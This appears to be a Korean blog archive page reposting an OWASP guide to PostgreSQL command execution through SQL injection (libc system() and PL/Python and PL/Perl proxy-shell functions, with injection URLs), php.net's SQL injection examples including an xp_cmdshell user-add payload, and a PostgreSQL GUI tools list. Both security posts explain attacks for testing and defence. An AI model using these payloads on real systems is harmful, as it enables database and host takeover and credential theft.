'PostgreSQL'에 해당되는 글 9건

  1. 2010.08.05 PostgreSQL Shell Injection
  2. 2010.03.03 PHP SQL 인젝션(Injection) 공격
  3. 2010.02.25 Community Guide to PostgreSQL GUI Tools
2010.08.05 15:19

PostgreSQL Shell Injection

Shell Injection

PostgreSQL provides a mechanism to add custom functions by using both Dynamic Library and scripting languages such as python, perl, and tcl.

Dynamic Library

Until PostgreSQL 8.1, it was possible to add a custom function linked with libc:

  • CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Since system returns an int how we can fetch results from system stdout?

Here's a little trick:

  • create a stdout table
    CREATE TABLE stdout(id serial, system_out text)
  • executing a shell command redirecting its stdout
    SELECT system('uname -a > /tmp/test')
  • use a COPY statements to push output of previous command in stdout table
    COPY stdout(system_out) FROM '/tmp/test'
  • retrieve output from stdout
    SELECT system_out FROM stdout

Example:

 
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

plpython

PL/Python allows users to code PostgreSQL functions in python. It's untrusted so there is no way to restrict what user can do. It's not installed by default and can be enabled on a given database by CREATELANG

  • Check if PL/Python has been enabled on a database:
    SELECT count(*) FROM pg_language WHERE lanname='plpythonu'
  • If not, try to enable:
    CREATE LANGUAGE plpythonu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read() 'LANGUAGE plpythonu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS ‘import os; return os.popen(args[0]).read()’ LANGUAGE plpythonu;--
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--

plperl

Plperl allows us to code PostgreSQL functions in perl. Normally, it is installed as a trusted language in order to disable runtime execution of operations that interact with the underlying operating system, such as open. By doing so, it's impossible to gain OS-level access. To successfully inject a proxyshell like function, we need to install the untrusted version from the postgres user, to avoid the so-called application mask filtering of trusted/untrusted operations.

  • Check if PL/perl-untrusted has been enabled:
    SELECT count(*) FROM pg_language WHERE lanname='plperlu'
  • If not, assuming that sysadm has already installed the plperl package, try :
    CREATE LANGUAGE plperlu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu;
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--


출처 : www.owasp.org

Trackback 0 Comment 0
2010.03.03 11:56

PHP SQL 인젝션(Injection) 공격

SQL 인젝션

많은 웹 개발자가 SQL 질의가 공격받을 수 있다는 점을 간과하고, SQL 질의를 신뢰할 수 있는 명령으로 가정합니다. 이로 인해 SQL 질의에서 접근 제어를 우회할 수 있여, 일반적인 인증과 인증 확인을 무시하고, 종종 SQL 질의가 OS 단계 명령을 할 수 있도록 합니다.

직접 SQL 명령 인젝션은 공격자가 숨겨진 데이터를 노출하거나, 취약한 부분을 덮어쓰거나, 데이터베이스에 위험한 시스템 단계 명령을 실행하게 하는 SQL 명령을 생성하거나 대체하는 기술입니다. 어플리케이션이 사용자 입력을 받아서, 이를 SQL 질의를 만들 떄 정적 인수로 조합함으로써 일어납니다. 유감스럽게도, 아래 예제들은 실제 이야기를 기반으로 하고 있습니다.

입력 검증이 없고 데이터베이스에 슈퍼유저나 사용자를 만들 수 있는 사용자로 접속하는 경우, 공격자가 데이터베이스에 슈퍼유저를 만들 수 있습니다.

Example #1 결과셋을 페이지로 나눔 ... 그리고 슈퍼유저 만들기 (PostgreSQL)

<?php

$offset 
$argv[0]; // 주의, 입력 검증 없음!
$query  "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$result pg_query($conn$query);

?>

일반 사용자는 URL에 $offset이 인코드되어 있는 'next', 'prev' 링크를 클릭합니다. 스크립트는 $offset이 정수라고 생각합니다. 그러나, 누군가가 다음처럼 URL에 추가적인 urlencode() 형식을 덧붙이면 어떻게 될까요?

0;
insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)
    select 'crack', usesysid, 't','t','crack'
    from pg_shadow where usename='postgres';
--

이렇게 되면, 스크립트에서 슈퍼유저 권한을 공격자에게 주게 됩니다. 0;가 유효한 offset으로 제공되어 원래 질의를 유효하게 하고 정료하는 점에 주의하십시오.

Note: SQL 해석기에서 개발자가 쓴 쿼리의 나머지 부분을 무시하게 하는 일반적인 방법은 --를 붙이는 것이며, 이는 SQL에서 주석 부호입니다.

패스워드를 얻는 방법 중 하나는 검색 결과 페이지를 우회하는 것입니다. 공격자에게 필요한 것은 제출한 변수 중 하나라도 제대로 다뤄지지 않으면서 SQL 구문에 사용되는 것입니다. 이러한 필터는 일반적으로 SELECT 구문에서 WHERE, ORDER BY, LIMIT, OFFSET에 사용됩니다. 데이터베이스가 UNION 구조를 지원하면, 공격자는 원래 질의에 전체 질의를 덧붙여서 임의의 테이블에서 패스워드를 얻을 수 있습니다. 암호화된 패스워드 필드를 강력히 권합니다.

Example #2 글을 출력함 ... 그리고 패스워드도 (모든 데이터베이스 서버)

<?php

$query  
"SELECT id, name, inserted, size FROM products
                  WHERE size = '
$size'
                  ORDER BY 
$order LIMIT $limit$offset;";
$result odbc_exec($conn$query);

?>

질의에서 정적인 부분은 모든 패스워드를 가져오는 SELECT 구문과 조합될 수 있습니다:

'
union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable;
--

이 질의('--로 다룸)가 $query에서 사용하는 변수 중 하나에 할당되면, 질의 괴물이 깨어납니다.

SQL UPDATE도 공격받을 수 있습니다. 이런 질의를 잘라내어서 완전한 새 질의를 덧붙일 수 있습니다. 또한 공격자가 SET 절을 다룰 수도 있습니다. 이 경우 질의를 성공적으로 변경하기 위하여 일부 스키마 정보를 가지고 있어야 합니다. 이는 폼 변수명을 조사하거나, 브루트 포스로 얻을 수 있습니다. 패스워드와 사용자이름을 저장하는 필드의 이름 규칙은 그리 많지 않습니다.

Example #3 패스워드 재설정에서 ... 더 많은 권한 얻기 (모든 데이터베이스 서버)

<?php
$query 
"UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";
?>

악의적인 사용자가 $uid' or uid like'%admin'; -- 값을 넣어서 관리자 패스워드를 변경하거나, $pwd"hehehe', admin='yes', trusted=100 "(마지막 공백 포함)을 설정하여 권한을 얻을 수도 있습니다. 그러면, 질의가 다음처럼 꼬입니다:

<?php

// $uid == ' or uid like'%admin%'; --
$query "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%'; --";

// $pwd == "hehehe', admin='yes', trusted=100 "
$query "UPDATE usertable SET pwd='hehehe', admin='yes', trusted=100 WHERE
...;"
;

?>

데티어베이스 호스트의 OS 등급 명령에 접근하는 섬뜩한 예제입니다.

Example #4 데이터베이스 호스트 OS 공격하기 (MSSQL 서버)

<?php

$query  
"SELECT * FROM products WHERE id LIKE '%$prod%'";
$result mssql_query($query);

?>

공격자가 $proda%' exec master..xp_cmdshell 'net user test testpass /ADD' -- 값을 제출하면, $query는:

<?php

$query  
"SELECT * FROM products
                    WHERE id LIKE '%a%'
                    exec master..xp_cmdshell 'net user test testpass /ADD'--"
;
$result mssql_query($query);

?>

MSSQL 서버는 로컬 계정 데이터베이스에 새 사용자를 추가하는 명령을 포함한 SQL 구문을 실행하게 됩니다. 어플리케이션이 sa로 실행되고 MSSQLSERVER 서비스가 적합한 권한을 가지고 있으면, 공격자는 머신에 접근할 수 있는 계정을 가지게 됩니다.

Note: 위 예제 중 일부는 특정 데이터베이스 서버에 묶여 있습니다. 이것은 다른 서버에 유사한 공격이 불가능하다는 의미가 아닙니다. 데이터베이스 서버가 다른 방식으로 비슷한 취약점을 가질 수 있습니다.


출처 : php.net


Trackback 0 Comment 0
2010.02.25 18:41

Community Guide to PostgreSQL GUI Tools

Open Source / Free Software

pgAdmin III

http://www.pgadmin.org/

MS Windows, GNU/Linux, FreeBSD, Mac OS X, OpenBSD, Solaris

Admin

pgAdmin III is THE Open Source management tool for your PostgreSQL databases. Features full Unicode support, fast, multithreaded query and data editting tools and support for all PostgreSQL object types.

pgAdmin III is bundled with the Windows installer, and you can use that such a client to administer a remote server on another OS. Note that binary packages for platforms like RPM don't show up in every point release, you currently have to go back to v1.8.0 to get the last full set of packages.

Free Administration Centre for the PostgreSQL database. Includes a graphical administration interface, an SQL query tool, a procedural code editor and much more. pgAdmin III is designed to answer the needs of most users, from writing simple SQL queries to developing complex databases. The graphical interface supports all PostgreSQL features and makes administration easy. Available in more than 30 languages and for several operating systems. (2005-04-19)

PGAccess

http://www.pgaccess.org/

Most platforms

ERD

The original PostgreSQL GUI, with an MS Access-style database browser, written in Tcl/Tk. Allows browsing, adding and editing tables, views, functions, sequencese, databases, and users, as well as graphically-assisted queries. A form and report designer are also under development by the PGAccess team, who could use help from some more Tcl/Tk coders and doc writers. (JMB 11.2002)

PGAccess has not been actively maintained for some time.

phpPgAdmin

http://sourceforge.net/projects/phppgadmin

browser-based, requires webserver

Admin

Similar to the ever-popular phpMyAdmin, enhanced for PostgreSQL, supports browsing and modification of most types of PostgreSQL database objects, plus execution of ad-hoc queries. Maintained by (who else?) the phpPgAdmin team. (JMB 11.2002).

phpPgAdmin (and the required Apache and PHP packages) may be easily installed using Stack Builder if you are running a one-click-installer PostgreSQL distribution.

OpenOffice.org

http://dba.openoffice.org/drivers/postgresql/index.html

Windows, Linux, Solaris

Verbatim from the above URL :

The postgresql SDBC Driver allows to use the postgresql database from OpenOffice.org without any wrapper layer such as odbc or jdbc. The current version 0.7.6 can be considerded as good beta quality ( with some known issues and missing features). The driver is aimed at the 1.1 OpenOffice.org and OpenOffice.org 2.x versions, it does not work with OOo1.0.x trees. The final aim is to have an easier to use, faster, more feature rich database driver than the jdbc-odbc solution. The current version should already allow this in most places.

The Red Hat Database Graphical Tools, RHDB Administrator and Visual Explain

http://sources.redhat.com/rhdb

Linux

Admin

Red Hat has stood by their word and open-sourced their database tools which ship with Red Hat Database for the benefit of the PostgreSQL community. I haven't used these, a review would be nice. Developed by Red Hat, Inc. (JMB 11.2002)

Xpg: Java PostgreSQL client

http://www.kazak.ws/xpg

Most platforms

Admin

Java-based PostgreSQL database administrator, with access to tables and data entry, query interface and ability to export query results to HTML reports. Developed by Soluciones Kazak, in Spanish, but available in English as well. (JMB 11.2002)

(xpg has not been updated since 2004)

Mergeant

http://www.gnome-db.org/

Linux, Unix

Admin

Database administration/user tool for GNOME, based on libgda/libgnomedb, which are a complete database-independent access layer for UNIX systems, with support for PostgreSQL, MySQL, Sybase, MS SQL Server, Oracle, Interbase/Firebird, MS Access files, xBase.

TOra, an Oracle tool with some PostgreSQL support

http://tora.sf.net./

Linux & Windows

Admin

An Oracle database administration interface, with limited ability to browse PostgreSQL databases (tables, views, and functions only). I'm told that if you have the Oracle libraries, Tora's sophisticated function editor will work for PostgreSQL as well. Developed by Henrik Johnson as a Quest Toad clone. (JMB 11.2002)

KNoda

http://www.knoda.org/

FreeBSD & Linux

Admin

knoda is a database frontend for KDE. It is based on hk_classes and is released under the GNU General Public License (GPL).

PGInhaler

http://pginhaler.ifrance.com/pginhaler/

Admin

It's a free Java based PostgreSQL GUI. Haven't used it yet, but worth knowing about. (J.C.)

(PGInhaler has not been updated since 2002)

SQuirreL

http://squirrel-sql.sourceforge.net/

Macintosh/Windows

SQuirreL SQL Client is a graphical SQL client written in Java that will allow you to view the structure of a JDBC compliant database, browse the data in tables, issue SQL commands etc.

AnySQL Maestro

http://www.sqlmaestro.com/products/anysql/maestro/

Windows

AnySQL Maestro is a freeware tool for administering any database engine (PostgreSQL, SQL Server, Oracle, MySQL, MS Access, etc.), which is accessible via ODBC driver or OLE DB provider. Includes Database Designer, Visual Query Builder, BLOB Viewer/Editor, SQL Editor, Data export/import and other features.

SQL Workbench/J

http://www.sql-workbench.net/

Java (multi-platform)

An OpenSource SQL GUI tool similar to Squirrel. Data can be edited directly in the result set. It has strong support for exporting and importing data between databases using its own SQL command extension. It can be used in GUI mode or as a console application. All SQL Workbench specific commands can also be run in batch mode to automate export and import task. It supports schema comparison ("diff") and copying data between databases.

PostgreSQL PHP Generator

http://www.sqlmaestro.com/products/postgresql/phpgenerator/

Windows

PostgreSQL PHP Generator is a freeware but powerful PostgreSQL GUI frontend that allows you to generate high-quality PHP scripts for the selected tables, views and queries for the further working with these objects through the web.

WaveMaker Ajax GUI Design Tool

http://www.wavemaker.com/

Windows, Macintosh, Linux

WaveMaker is an Ajax-based GUI design tool for Postgres. WaveMaker is built using itself! WaveMaker generates a standard Java WAR file based on Spring, Hibernate and Dojo. WaveMaker supports Postgres schema creation and import and includes a visual query editor.

Druid III

http://druid.sourceforge.net/

Java (multi-platform)

The druid is a tools that allows users to create databases in a graphical way. The user can add tables, fields, folders to group tables and can modify most of the database options that follow the SQL-92 standard. In addition to sql options, the user can document each table and each field with HTML information. Once the database is created, the druid can generate:

  • HTML documentation: for all tables, with browsing facilities
  • PDF documentation: for all tables
  • Java classes: (one class for each table) that contain tables' constants (such as fields size) plus java code added by the user
  • A data dictionarythat contains all tables and fields present in the database
  • SQL script which contains all table definitions that can be piped to the DBMS
  • And much more info...

Power*Architect

http://www.sqlpower.ca/page/architect

Java (multi-platform)

Power*Architect is an ERD modelling tool that is based on Java and JDBC. Support for forward and reverse engineering PostgreSQL databases is supported. It's OpenSource with a GPL license.

Proprietary

Lightning Admin for PostgreSQL

http://www.amsoftwaredesign.com/lightning_admin

Windows, other platforms via WINE

Admin

Lightning Admin is one of the best GUI admin tools available and sports a modern tabbed MDI interface and is the least expensive full featured GUI admin tool on the market. Compare to Navicat or EMS and save big. Current price is $19.99 per user.

Borland Kylix

http://www.borland.com/kylix

Linux

ERD

driver: http://www.vitavoom.com/Products/pgExpress_Driver/index.html

The third most popular IDE for Linux, according to a recent Linux Journal poll. Focuses on interface-building for database applications, with some support for browsing database objects (I think). PostgreSQL native drivers are available free from Vita Voom Software. (JMB 11.2002)

DBOne

http://www.dbone.info/

Windows

Admin

DBOne is a shareware Database Administration Tool for PostgreSQL and Oracle, MSSQL, Sybase, DB2, SAPDB, Interbase/Firbird, MySQL.

DBTools Manager

http://www.dbtools.com.br/

Windows

Admin

Freeware, available for PostgreSQL and MySQL, allows managing all aspects of the database: db, table, triggers, functions, etc. Includes import/export wizards to migrate data and structure to/from other database engines. Developed by DBTools Software.

PgManager

http://www.ems-hitech.com/pgmanager

Windows, Linux version just released

Admin

Basically a proprietary, more powerful version of PGAdmin II or PGAccess. Adds support for trigger and constraint editing, metadata logging, and query monitoring. Also includes multiple-format data import/export tools, which are also available on their own for Linux. Developed by EMS Hitech. (JMB 4.2003).


Rekall

http://www.thekompany.com/products/rekall

Linux

ERD

Designed by The Kompany as a Linux-based competitor to MS Access, this simple interface and database interface-builder is unfortunately designed for MySQL and has some problems with PostgreSQL. Was still buggy in May 2002, but may be improved by now. Supports limited browsing of database objects, creation of data entry forms and reports. (JMB 11.2002)

Data Architect

http://www.thekompany.com/products/dataarchitect

Linux

ERD

I'm trying DataArchitect 2 from theKompany now for 6 month. Highly recommended if you want an easy to use DB-Design Tool, but generated SQL-Scripts needs some rework. PostgreSQL is supported, you easily can create Stored Procedures, Foreign Keys, Views and Triggers. (Bernd, 1.2003)

SyBase Power Designer

http://www.sybase.com/products/enterprisemodeling/powerdesigner

Admin

Sybase PowerDesigner is power tool with built in PostgreSQL support. It support tables, views, triggers, constraints and referential integrity. More advanced than Data Architect.

Microsoft Access

http://office.microsoft.com/

Windows + ODBC only

ERD, Admin

Yes, you can use MS Access as a PostgreSQL database interface. Supports data access to PostgreSQL tables and views; many ODBC-based limitations and errors. I don't need to tell anyone what MS Access' other capabilities are. (JMB 11.2002)

eRWin

http://www.ca.com/products/alm/erwin.htm

Windows

ERD

Apparently a high-end tool by Computer Associates with PostgreSQL support as a downloadable addon for some version(s). Haven't tried this. JC

DeZign for Databases

http://www.datanamic.com/

Windows

ERD

DeZign is a database development tool using an entity relationship diagram. It visually supports the lay out of the entities and relations and automatically generates SQL schemas for most leading databases including PostgreSQL.

PGExplorer

http://www.pgexplorer.com/

Windows (Shareware)

Admin NOTE this software is not maintained and has not had a new release in many years. Because of it's age it does not support schemas on PGSQL versions 7.3 and up.

Postgres Explorer is a full-featured GUI postgres development tool. Features include a tree view of your databases, and database objects. You can reverse engineer SQL statements from your database objects , modify the SQL and execute it. Wizards will guide you through the process to generate SQL for various objects and statements. The latest release includes a Graphical Select Query Designer (anonymous, 4.2003)

Case Studio 2

http://www.casestudio.com/

Windows

ERD

I just downloaded the trial version, so far it looks real promising and claims to support PostgreSQL. Handles reverse engineering of existing databases, and has a real nice interface for setting up tables, relationships etc. You can get a lite or full version. The description from the website... Professional database modeling tool for various databases. CASE Studio 2 includes following key features:

LITE version features + Reverse Engineering from various database systems Version Manager Data Flow Diagrams Definition of user defined variables Large COM interface Users, User groups and User permission support and many more.

pgEdit

http://pgedit.com/

Macintosh/Windows

pgEdit is a high performance SQL editor and development environment designed specifically for PostgreSQL relational databases. pgEdit features include SQL syntax coloring, direct source code execution, PHP support, integrated documentation, and extensive customizable editing facilities.

pgEdit uses psql, the interactive terminal application included with every PostgreSQL installation. This makes it easy to develop with pgEdit and then transfer your work to any PostgreSQL installation for maintenance and production tasks.

pgEdit is a native application for both Macintosh and Windows. It does not use Java or require installation of external libraries. You have the option of using the version of psql included with pgEdit or a different version installed anywhere on your hard drive.


RazorSQL

http://www.razorsql.com/

Macintosh/Windows/Linux/Solaris

RazorSQL is an SQL query tool, database browser, SQL editor, and database administration tool that supports PostgreSQL and any other JDBC or ODBC compliant database. Some of the major features are tools for creating, dropping, and altering objects such as tables, views, indexes, triggers, functions, users, and databases; a programming editor that supports 20 different programming languages; import and export tools; auto column and table lookup; and a query builder, query scheduler, and SQL formatter.


MicroOLAP Database Designer

http://www.microolap.com/products/database/postgresql-designer/

Windows ODBC

Database Designer for PostgreSQL is an easy CASE tool with intuitive graphical interface allowing you to build a clear and effective database structure visually, see the complete picture (diagram) representing all the tables, references between them, views, stored procedures and other objects. Then you can easily generate a physical database on a server, modify it according to any changes you made to the diagram using fast ALTER statements.

Aqua Data Studio

http://www.aquafold.com/index-postgresql.html

Java: Windows/Linux/Macintosh OSX/Solaris

Aqua Data Studio is a management tool for the PostgreSQL relational database w/ administration capabilities and a database query tool. The visual administration features provide users the ability to browse and modify database structures, including schema objects, database storage and maintain database security. An integrated query tool allows users to quickly create, edit and execute SQL queries and scripts. Aqua Data Studio also provides an import and export tool to allow users to easily move data in and out of the PostgreSQL database in and from different data formats.

EMS SQL Management Studio for PostgreSQL

http://www.sqlmanager.net/en/products/studio/postgresql

Windows

EMS SQL Management Studio for PostgreSQL is a complete solution for PostgreSQL database administration and development. With components that focus on all critical PostgreSQL database management tasks, SQL Studio is a single workbench that provides you with must-have tools for administering PostgreSQL databases, managing database schema and objects as well as for PostgreSQL database design, migration, extraction, PostgreSQL query building, data import, export and database comparison. SQL Studio unites these database tools for PostgreSQL in one powerful and easy-to-use environment that can work round the clock. With SQL Management Studio many database administration objectives, such as migration, data loading and synchronization, database backup and extraction can be automated, allowing PostgreSQL database administrators and PostgreSQL application developers to perform complex tasks on a regular basis with the minimum number of efforts and a high level of flexibility.

Navicat

http://pgsql.navicat.com/

Windows/Macintosh OSX

Navicat is a powerful PostgreSQL Database Server administration and development tool. It works with PostgreSQL 8.0 version or above and supports most of the PostgreSQL features including Trigger, Function, View, Manage User, and so on. It is also not only sophisticated enough for professional developers, but also easy to learn for new users. With its well-designed GUI, Navicat lets you quickly and easily create, organize, access and share information in a secure and easy way.

SQL Maestro Group products for PostgreSQL

http://www.sqlmaestro.com/products/postgresql/

Windows

SQL Maestro Group offers a number of tools for PostgreSQL.

  • PostgreSQL Maestro allows you to create, edit, copy, drop and dump database objects easy and fast. You can also design your database as ER diagram, build queries visually, execute SQL queries and scripts, debug PL/pgSQL functions, view and edit data including BLOBs, represent data as diagrams, export and import data to/from most popular file formats, analyze your data summarized into multidimensional views and hierarchies (OLAP cubes), manage PostgreSQL roles, users, groups and privileges, and use a lot of other admin tools designed for making your work with PostgreSQL database server comfortable and efficient.
  • PostgreSQL Data Wizard provides you with a number of easy-to-use wizards to generate PHP and ASP.NET scripts for the selected tables, views and queries, convert any ADO-compatible database to the PostgreSQL database, export data from PostgreSQL tables, views and queries to most popular formats, and import data into the tables.

SQL Maestro Group also produces similar tools for MySQL, Oracle, MS SQL Server, DB2, SQL Anywhere, SQLite, Firebird and MaxDB.

DB Data Difftective PostgreSQL Edition

http://www.datanamic.com/datadiff/index.html

Windows

DB Data Difftective is a utility for data comparison and synchronization. Compare data for selected tables in two databases, view differences and publish changes quickly and safely. Flexible comparison and synchronization settings will enable you to set up a customized comparison key and to select tables and fields for comparison and for synchronization. DB Data Difftective can be used for data migrations, verification of (corrupt) data, data auditing etc.

DB Schema Difftective PostgreSQL Edition

http://www.datanamic.com/schemadiff/index.html

Windows

DB Schema Difftective is a tool for comparison and synchronization of database schemas. It allows you to compare and synchronize tables, views, functions, sequences (generators), stored procedures, triggers and constraints between two databases.

DB MultiRun PostgreSQL Edition

http://www.datanamic.com/multirun/index.html

Windows

DB MultiRun is a simple tool to execute multiple SQL scripts on multiple databases quickly. Define a list of databases, add SQL scripts to execute on these databases and click "execute" to run those scripts on the databases in the list. The multi-threaded execution of the SQL scripts makes it complete the task fast. After execution of the scripts you can examine the results of the executed scripts on each database.

SQLPro

http://www.vive.net/products/sqlpro.htm

Windows

SqlPro is an easy to use database GUI tool for six popular databases (Oracle, MySQL, PostgreSQL, SQL Server, SQLite and Access). One IDE makes database administration and development faster and error free. SQLPro Key Features: color-coding of the SQL, drag-and-drop of objects into the editor pane to save you from typing their names, retrieval of SQL code for things like stored procedures and triggers from the underlying database, and one-click creation of SELECT and INSERT statements. You can open, save and print SQL scripts. SQLPro uses native drivers to connect to the databases (no ODBS or third party engines to install).

SQL Image Viewer

http://www.sqlimageviewer.com/

Windows

SQL Image Viewer allows you to retrieve, view, convert and export images stored in Firebird, MySQL, Oracle, SQLite, SQL Server, and various ODBC-supported databases (e.g. DB2 and PostgreSQL). It supports the following image formats: BMP, GIF, JPG, PNG, PSD, and TIFF.

It also allows you to export binary data, and recognises the following binary file types: PDF, MP3, WAV, 7Z, BZ2, GZ, RAR, ZIP, and has experimental support for DOC, PPT and XLS file types.


출처 : http://wiki.postgresql.org


Trackback 25 Comment 0